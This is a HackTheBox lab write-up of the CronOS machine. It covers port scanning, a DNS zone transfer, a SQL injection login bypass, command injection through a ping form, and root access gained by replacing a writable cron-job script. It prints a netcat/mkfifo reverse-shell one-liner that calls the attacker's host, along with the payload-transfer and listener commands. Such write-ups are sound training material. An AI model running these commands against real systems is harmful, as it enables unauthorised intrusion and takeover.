Another OSCP-like Box: CronOS
This is my third writeup in the OSCP-like Boxes series.
CronOS , a HackTheBox machine at 10.10.10.13, is a Linux box that aims to help aspiring Penetration Tester practice on Enumeration, SQL and Command Injections and exploiting weak permissions in Cron job.
Scanning and Enumeration
I normally start my enumeration with Nmap.
sudo nmap -T5 -n -vvv -oA initial-scan 10.10.10.13
- -T5 is the fastest scan. The default scan speed is -T3
- -n disables name resolution
- ---vvv uses a verbose scan
- -oA saves the output in all file formats
Next, I performed a targeted scan on the open TCP ports. I used a Default-NSE Script, Version and Operating System scans.
sudo nmap -sC -sV -O -p22,53,80 -oA targeted-scan 10.10.10.10.13
All TCP Port Scan
To confirm all open TCP ports, I used Masscan. Alternatively, I can also use Nmap -p- option here.
sudo masscan -e tun0 -p1-65535 --interactive 10.10.10.13
UDP Scan
It’s a best practice to scan the UDP ports. I started with common ports since UDP takes a lot of time to finish.
sudo nmap -sU -sC --top-ports 20 -oA udp-top20 10.10.10.13
Based on my scans, I found that TCP ports 22, 80, and 53 are open.
Port 22
I continued my enumeration and possible exploitation on port 22. Based on Figure 1.1 this is running OpenSSH 7.2p2. There are no major vulnerabilities for this version. Generally, I dont see any major vulnerability on SSH unless its a very old version.
Port 80
I also browsed the web server and it seemed running the default configuration.
Nikto
I ran Nikto to enumerate the web server hoping we can find anything useful.
nikto -h 10.10.10.13
Gobuster
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.13
I also used Gobuster to see any exposed directory on the web server.
Port 53
Nslookup
Since I didn't get any meaningful information on the web server, I then enumerated the DNS server.
nslookup 10.10.10.13 10.10.10.13
The first argument in this Non-interactive Nslookup command is the name or the IP Address of the host to be looked up while the second argument specifies the host name or address of a name server.
Based on Nslookup, I found out the cronos.com domain name.
Exploitation
I then performed a DNS Zone Transfer since the server is running on TCP. I used Dig.
dig axfr @10.10.10.13 cronos.htb
I found additional host such as admin.cronos.htb. I then added cronos.htb, admin.cronos.htb, ns1.cronos.htb to the /etc/host file in my Kali.
sudo nano /etc/hosts
SQL Injection
I checked admin.cronos.htb in a browser and noticed that it’s an authentication page. Common usernames and passwords did not work for this page.
I then tested the fields for SQL injection vulnerability and attack. I used this link for reference. I entered the common SQL injection attack below in the username and the password fields. I added a trailing space after “--”.
‘ OR ‘1’=’1' --
I was able to bypass the authentication page and found a basic application that performs Traceroute and Ping commands.
I tried if I can perform a command injection in this basic application. This link is a good reference for Command Injection attacks.
Based on the output, I was able to perform a Command Injection using the “|” character.
Reverse Shell
I then tried multiple reverse shell one liner. I had multiple success with the reverse shell one-liner from this Github link.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 4444 >/tmp/f
Listener
I ran a Netcat listener on port 4444
sudo nc -nlvp 4444
I then had a non-interactive reverse shell of CronOS.
Post Exploitation
I upgraded my access to an interactive shell. Please refer to this link on how to upgrade your shell.
A good tool to use in doing Privilege Escalation is Linux Smart Enumeration from Diego Blanco. It can be downloaded from this Github link.
wget https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh
Host the file using SimpleHTTPServer
sudo python -m SimpleHTTPServer 80
I then went to a directory that I have write permission and downloaded the tool using Wget.
cd /dev/shm
wget http://10.10.14.4/lse.sh
I ran the script using the following syntax.
bash lse.sh -i -l 1
Looking at the tool output, I noticed a Cron job that is not default in a Linux host. I checked the permission of the script and found out that the Root user created this Cron job but the file itself is owned by www-data. Since www-data has full permission of /var/www/laravel/artisan, I just replaced it with a reverse shell and got a root access when the Cron job ran.
ls -l /var/www/laravel/artisan
I looked for a PHP reverse shell script in Kali, edited the IP of the script to the IP of my Kali and overwrite the Cron job file.
locate php-reverse-shell
cp /usr/share/laudanum/php/php-reverse-shell.php .
nano php-reverse-shell
I changed the IP in the script to 10.10.14.4, the IP of my Kali.
Host the file using SimpleHTTPServer and transfer the file to CronOS
python -m SimpleHTTPServer
wget http://10.10.14.4/php-reverse-shell.php
Listener
I set up another Netcat listener on port 8888 then copied php-reverse-shell.php to var/www/laravel/artisan
nc -nlvp 8888
cp php-reverse-shell.php /var/www/laravel/artisan
Root access!
Flags
Key Takeaways
- Limit the information that the DNS server will provide, disable DNS zone transfers to untrusted servers.
- Practice SDLC when creating applications
- Apply appropriate patch and mitigations to different injection attacks
- Implement proper file permissions